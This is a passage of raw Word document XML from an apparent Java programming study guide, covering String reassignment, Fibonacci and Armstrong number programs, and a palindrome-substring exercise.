          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">However, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>you can reassign</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the reference variable (str) to point to a new String object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBF98A8" w14:textId="77777777" w:rsidR="000A7823" w:rsidRPr="00CE4B95" w:rsidRDefault="000A7823" w:rsidP="000A7823">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>In the code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D502D7D" w14:textId="77777777" w:rsidR="000A7823" w:rsidRPr="00CE4B95" w:rsidRDefault="000A7823">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="294"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>String str = "India"; — creates a String object "India" and assigns it to str.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EDE0B0" w14:textId="77777777" w:rsidR="000A7823" w:rsidRPr="00CE4B95" w:rsidRDefault="000A7823">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="294"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">str = "Bharat"; — now str points to a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> String object "Bharat".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD19654" w14:textId="77777777" w:rsidR="000A7823" w:rsidRPr="00CE4B95" w:rsidRDefault="000A7823">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="294"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>So when you print str, it refers to "Bharat".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D5E310" w14:textId="77777777" w:rsidR="00FB16E6" w:rsidRPr="00CE4B95" w:rsidRDefault="00FB16E6" w:rsidP="00BC56B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49886643" w14:textId="6E9CB1CF" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="353" w:name="_Toc196307833"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="00A44B05" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Fibonacci series of nth number</w:t>
      </w:r>
      <w:bookmarkEnd w:id="353"/>
    </w:p>
    <w:p w14:paraId="626EB733" w14:textId="7BB8C696" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04332A73"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canner</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F02112"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00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C317838"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ibonacciSerie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0DDDD87"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00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A884E12"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Function to print Fibonacci series up to n terms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A27F40F"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printFibonacci</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9CAD677"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b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0592661B"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00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C63C93D"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Fibonacci Series up to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terms: "</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2C022C"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00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625C4A18"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9935B28"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751CB83D"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00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D4EA87"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ompute next term</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28362C50"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x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b</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414EC8C9"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00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            a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b</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0679AB0D"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00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            b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xt</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A3D802"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CA286BE"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217DB7A"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00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084B907F"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5F2FBF4"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canner</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> scann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canner</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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B892BC"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Enter the number of terms: "</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E220FE"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cann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extInt</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2218A34A"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00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263D20D5"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00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        printFibonacc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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122141C8" w14:textId="77777777" w:rsidR="00BE2C29" w:rsidRPr="00CE4B95"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CA6AF6D" w14:textId="29A240C1" w:rsidR="00A44B05" w:rsidRPr="00CE4B95" w:rsidRDefault="00BE2C29" w:rsidP="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02ADCD4F" w14:textId="77777777" w:rsidR="00A44B05" w:rsidRPr="00CE4B95" w:rsidRDefault="00A44B05" w:rsidP="00A44B05">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19F17FF3" w14:textId="6C7A1A45" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="354" w:name="_Toc196307834"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="00FD5823" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Armstrong number</w:t>
      </w:r>
      <w:bookmarkEnd w:id="354"/>
    </w:p>
    <w:p w14:paraId="346C32B8" w14:textId="37BE36BA" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DD7C7E0"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canner</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1BA880"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121C2552"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mstrongNumb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CD08724"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DD4D70"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isArmstrong</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umb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2F0A7F7"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original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ber</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5568863F"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resul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25F2FEB9"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valueOf</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umb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p>
    <w:p w14:paraId="7622BEE5"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E02402B"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whi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umber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7647788"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digi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b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0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544A61F0"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resul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igi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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449C239B"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numb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0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350ECEF8"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426DBE2"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CE3423"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resul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original</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB2DDAF"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EEF5A8A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F714369"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isArmstrong</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73406D6"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digit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valueOf</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p>
    <w:p w14:paraId="61F70499"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s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valueOf</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um</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C785F03"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hars</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E1D27B"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harac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NumericValue</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42546ABC"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d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digits</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8F9506"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um</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E54E225"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69746C8C"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s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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32751F29"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2393BBD"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B5A550"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B93DE3A"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canner</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> scann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canner</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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C15421"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Enter a number to check if it's an Armstrong number: "</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC52F9B"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umb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cann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extInt</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C0414C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A95E158"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Armstro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umb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2F2B38D"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umb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is an Armstrong number."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DF061C"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ls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DFA2A80"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umb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is NOT an Armstrong number."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613D5188"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86DB0DE" w14:textId="77777777"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4C6BAC4" w14:textId="681803EA" w:rsidR="00950263" w:rsidRPr="00CE4B95"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7DF131DC" w14:textId="77777777" w:rsidR="00D51710" w:rsidRPr="00CE4B95" w:rsidRDefault="00D51710" w:rsidP="00D51710">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35E29F00" w14:textId="36215531" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="355" w:name="_Toc196307835"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="00EB33BE" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Print possible set of Palindrome for given String</w:t>
      </w:r>
      <w:bookmarkEnd w:id="355"/>
    </w:p>
    <w:p w14:paraId="241F77DB" w14:textId="77777777" w:rsidR="00AC4687" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925" w:rsidP="00AC4687">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="00AC4687" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Write a program to print a possible set of palindromes of a given string?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6645C4D4" w14:textId="4492E43B" w:rsidR="00AC4687" w:rsidRPr="00CE4B95" w:rsidRDefault="00AC4687" w:rsidP="00AC4687">
      <w:pPr>
        <w:ind w:left="360"/>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t>Input: ABBAAAAABBA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9CE2AB" w14:textId="524A905C" w:rsidR="00AC4687" w:rsidRPr="00CE4B95" w:rsidRDefault="00AC4687" w:rsidP="00AC4687">
      <w:pPr>
        <w:ind w:left="360"/>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t>Output: B, BB, AA, AAA, AAAA, AAAAA, ABBA, BAAAAAB, BBAAAAABB,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FA9AE4" w14:textId="4F3F259D" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00AC4687" w:rsidP="00AC4687">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pP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t>ABBAAAAABBA</w:t>
      </w:r>
    </w:p>
